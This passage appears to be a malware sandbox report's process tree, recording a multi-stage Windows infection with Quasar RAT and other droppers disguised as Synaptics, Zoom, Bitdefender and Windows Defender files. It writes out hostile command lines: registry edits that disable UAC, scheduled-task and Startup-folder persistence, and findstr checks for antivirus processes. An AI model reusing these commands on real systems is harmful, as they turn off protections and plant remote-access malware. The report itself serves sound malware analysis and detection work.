                                                                                                                                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\mgfpRTWIUj34.bat" "
                                                                                                                                    5⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:3416
                                                                                                                                    • C:\Windows\SysWOW64\chcp.com
                                                                                                                                      chcp 65001
                                                                                                                                      6⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:1424
                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                      ping -n 10 localhost
                                                                                                                                      6⤵
                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                      • Runs ping.exe
                                                                                                                                      PID:2360
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"
                                                                                                                                      6⤵
                                                                                                                                        PID:2244
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          "schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f
                                                                                                                                          7⤵
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:4768
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\uTBZJw95QmYA.bat" "
                                                                                                                                          7⤵
                                                                                                                                            PID:2216
                                                                                                                                            • C:\Windows\SysWOW64\chcp.com
                                                                                                                                              chcp 65001
                                                                                                                                              8⤵
                                                                                                                                                PID:908
                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                ping -n 10 localhost
                                                                                                                                                8⤵
                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:3364
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 1436
                                                                                                                                              7⤵
                                                                                                                                              • Program crash
                                                                                                                                              PID:860
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 1460
                                                                                                                                          5⤵
                                                                                                                                          • Program crash
                                                                                                                                          PID:3908
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe"
                                                                                                                                      3⤵
                                                                                                                                        PID:948
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                                          4⤵
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:3136
                                                                                                                                    • C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                      2⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                      PID:3060
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
                                                                                                                                        3⤵
                                                                                                                                        • Downloads MZ/PE file
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Modifies system certificate store
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                        PID:2908
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\1.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\1.exe"
                                                                                                                                          4⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Drops file in Windows directory
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                          PID:2160
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c copy Universities Universities.cmd & Universities.cmd
                                                                                                                                            5⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                            PID:1472
                                                                                                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                              tasklist
                                                                                                                                              6⤵
                                                                                                                                              • Enumerates processes with tasklist
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:2580
                                                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                              findstr /I "opssvc wrsa"
                                                                                                                                              6⤵
                                                                                                                                                PID:2312
                                                                                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                tasklist
                                                                                                                                                6⤵
                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:1672
                                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                6⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:4112
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd /c md 634977
                                                                                                                                                6⤵
                                                                                                                                                  PID:4364
                                                                                                                                                • C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                  extrac32 /Y /E Gtk
                                                                                                                                                  6⤵
                                                                                                                                                    PID:4600
                                                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                    findstr /V "Constitution" Wagon
                                                                                                                                                    6⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:1692
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd /c copy /b 634977\Surrey.com + Firewire + Values + Expanding + Representing + Gothic + Voltage + Refinance + Nec + Kate 634977\Surrey.com
                                                                                                                                                    6⤵
                                                                                                                                                      PID:1900
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      cmd /c copy /b ..\Courage + ..\Remove + ..\Throws + ..\Competing Q
                                                                                                                                                      6⤵
                                                                                                                                                        PID:3856
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com
                                                                                                                                                        Surrey.com Q
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                        PID:4160
                                                                                                                                                      • C:\Windows\SysWOW64\choice.exe
                                                                                                                                                        choice /d y /t 5
                                                                                                                                                        6⤵
                                                                                                                                                          PID:4964
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\Update.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\Update.exe"
                                                                                                                                                      4⤵
                                                                                                                                                      • Drops startup file
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:2600
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 684
                                                                                                                                                        5⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:1508
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe"
                                                                                                                                                      4⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                      PID:5104
                                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\0cef7d10d8f459fc\ScreenConnect.ClientSetup.msi"
                                                                                                                                                        5⤵
                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                        PID:1592
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe"
                                                                                                                                                      4⤵
                                                                                                                                                      • Adds policy Run key to start application
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:4896
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:2820
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                          6⤵
                                                                                                                                                          • UAC bypass
                                                                                                                                                          • Modifies registry key
                                                                                                                                                          PID:548
                                                                                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:1580
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Bitdefender\$77-Bitdefender.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:3952
                                                                                                                                                          • C:\ProgramData\Bitdefender\$77-Bitdefender.exe
                                                                                                                                                            C:\ProgramData\Bitdefender\$77-Bitdefender.exe
                                                                                                                                                            7⤵
                                                                                                                                                            • Adds policy Run key to start application
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                            PID:4020
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                              8⤵
                                                                                                                                                                PID:4056
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                  9⤵
                                                                                                                                                                  • UAC bypass
                                                                                                                                                                  • Modifies registry key
                                                                                                                                                                  PID:4280
                                                                                                                                                              • \??\c:\program files (x86)\internet explorer\iexplore.exe
                                                                                                                                                                "c:\program files (x86)\internet explorer\iexplore.exe"
                                                                                                                                                                8⤵
                                                                                                                                                                • Adds policy Run key to start application
                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                PID:1532
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                  9⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:4080
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                    10⤵
                                                                                                                                                                    • UAC bypass
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                    PID:4264
                                                                                                                                                                • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                  svchost.exe
                                                                                                                                                                  9⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:4144
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\windows.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\windows.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        PID:3000
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
                                                                                                                                                          5⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:3172
                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
                                                                                                                                                            6⤵
                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                            PID:3492
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpE189.tmp.bat""
                                                                                                                                                          5⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:3336
                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                            timeout 3
                                                                                                                                                            6⤵
                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                            PID:1656
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\system.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\system.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:4748
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        PID:3412
                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                                                                                                                                                          "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe' -Force
                                                                                                                                                          5⤵
                                                                                                                                                          • Drops startup file
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          PID:3392
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\access.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\access.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:4044
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe"
                                                                                                                                                        4⤵
                                                                                                                                                          PID:3112
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                                                            5⤵
                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                            PID:3916
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                                                                                            5⤵
                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                            PID:5084
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                                                              6⤵
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:3840
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\S0Ahb7wqiLdU.bat" "
                                                                                                                                                              6⤵
                                                                                                                                                                PID:700
                                                                                                                                                                • C:\Windows\system32\chcp.com
                                                                                                                                                                  chcp 65001
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:2308
                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                    ping -n 10 localhost
                                                                                                                                                                    7⤵
                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                    PID:3856
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                    PID:2320
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                                                                      8⤵
                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                      PID:4804
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\4ZAVHlJm6aW9.bat" "
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:3500
                                                                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                                                                          chcp 65001
                                                                                                                                                                          9⤵
                                                                                                                                                                            PID:3964
                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                            ping -n 10 localhost
                                                                                                                                                                            9⤵
                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                            PID:2692
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                                                                                                            9⤵
                                                                                                                                                                              PID:1244
                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                                                                                10⤵
                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                PID:2956
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\X5hI9T69oF0z.bat" "
                                                                                                                                                                                10⤵
                                                                                                                                                                                  PID:2576
                                                                                                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                                                                                                    chcp 65001
                                                                                                                                                                                    11⤵
                                                                                                                                                                                      PID:1632
                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                      ping -n 10 localhost
                                                                                                                                                                                      11⤵
                                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                      PID:4892
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                                                                                                                      11⤵
                                                                                                                                                                                        PID:4340
                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                          "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                                                                                          12⤵
                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                          PID:4376
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\3wSQiyOdnYt3.bat" "
                                                                                                                                                                                          12⤵
                                                                                                                                                                                            PID:2696
                                                                                                                                                                                            • C:\Windows\system32\chcp.com
                                                                                                                                                                                              chcp 65001
                                                                                                                                                                                              13⤵
                                                                                                                                                                                                PID:1148
                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                ping -n 10 localhost
                                                                                                                                                                                                13⤵
                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                PID:3884
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe"
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:4956
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  "schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:2248
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:4644
                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                    "schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                    PID:3008
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\Servers.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\Servers.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:484
                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                    "schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f
                                                                                                                                                                                    5⤵
                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                    PID:3164
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe"
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:3752
                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                        "schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                        PID:1044
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:940
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:884
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Modifies registry key
                                                                                                                                                                                            PID:4752
                                                                                                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:4460
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:2452
                                                                                                                                                                                                • C:\ProgramData\GoogleDat\GoogleUpdate.exe
                                                                                                                                                                                                  C:\ProgramData\GoogleDat\GoogleUpdate.exe
                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                    PID:3280
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                        PID:1132
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                          • Modifies registry key
                                                                                                                                                                                                          PID:3004
                                                                                                                                                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                        svchost.exe
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                          PID:3092
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\mac.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\mac.exe"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:3780
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:448
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:2664
                                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                  • Boot or Logon Autostart Execution: Authentication Package
                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                  PID:800
                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 7DFC0315C2B2425ED030A7470E203C96 C
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    PID:2936
                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
